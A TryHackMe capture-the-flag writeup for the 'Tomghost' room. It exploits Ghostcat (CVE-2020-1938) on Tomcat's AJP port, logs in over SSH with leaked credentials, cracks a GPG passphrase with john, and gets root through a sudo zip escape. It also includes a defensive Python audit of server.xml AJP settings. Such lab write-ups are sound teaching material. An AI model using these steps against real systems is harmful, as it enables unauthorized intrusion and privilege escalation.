Tomghost — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Tomghost — TryHackMe — Writeup. Check it out!
First, deploy the machine and run nmap to scan for open ports.
nmap -T4 -p- -A <ip>
Let’s access its website, since an Apache server is running.
As the room says, this Apache Tomcat version is affected by CVE-2020-1938 (Ghostcat). So let’s search for this CVE on Google. Here I found a Python script on GitHub.
Download the script and run it. Note that the port we are going to attack is 8009 (the AJP connector), not 8080 (HTTP).
python3 tomcat.py <ip> -f /WEB-INF/web.xml -p 8009
I can read the content of web.xml
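The file read above works because the AJP connector is reachable from the network without a shared secret. As an added defender-side check (example code written for this writeup, not the room’s machine or the exploit script), here is a small audit of Tomcat’s server.xml that flags AJP connectors not bound to loopback or configured without a secret; the two server.xml fragments are constructed samples.

```python
import xml.etree.ElementTree as ET

# Constructed sample: AJP connector on all interfaces, no secret (the Ghostcat-prone shape).
VULNERABLE_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed sample: AJP bound to loopback and protected by a shared secret (placeholder value).
HARDENED_SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="CHANGE-ME-placeholder" redirectPort="8443" />
  </Service>
</Server>
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP connector that looks exposed; empty list means nothing flagged."""
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue  # only AJP connectors matter for Ghostcat
        port = conn.get("port", "?")
        problems = []
        address = conn.get("address")
        if address is None or address not in LOOPBACK:
            problems.append('AJP reachable on all interfaces (set address="127.0.0.1" or block port %s)' % port)
        # Conservative check: we do not know the Tomcat version, so a connector is flagged unless a
        # shared secret is actually set (patched builds default secretRequired="true" and refuse to
        # start without one, older builds silently accept unauthenticated AJP clients).
        secret_required = conn.get("secretRequired", "true").lower() != "false"
        has_secret = bool(conn.get("secret") or conn.get("requiredSecret"))
        if not secret_required or not has_secret:
            problems.append("no AJP shared secret configured")
        if problems:
            findings.append({"port": port, "problems": problems})
    return findings
```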
I found something that looks like a credential! It’s skyfuck and his password. Let’s try to SSH in using that credential.
ssh skyfuck@<ip>
Success!
Now get our first flag.
Let’s see what’s inside skyfuck’s home folder.
I see a credential file that was encrypted using gpg. There is also a key to decrypt that file: tryhackme.asc
In order to decrypt that file, we need a passphrase. We don’t know it yet, but we can brute-force it using john.
Let’s cat tryhackme.asc and copy its content to a text file.
Execute these 2 commands:
gpg2john tryhackme.asc > gpgjohn.txt
john --wordlist=/path-to-wordlist gpgjohn.txt
Now we have the passphrase: alexandru
Now decrypt credential.pgp with that passphrase, and we get its content:
su merlin with that password, and now we are merlin.
Now run sudo -l to see which commands merlin can run as root.
So merlin can run the zip command as root. Refer to https://gtfobins.github.io/gtfobins/zip/#sudo
Execute these commands to get root:
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
Now I’m root! Get our final flag.
The end.
HAPPY HACKING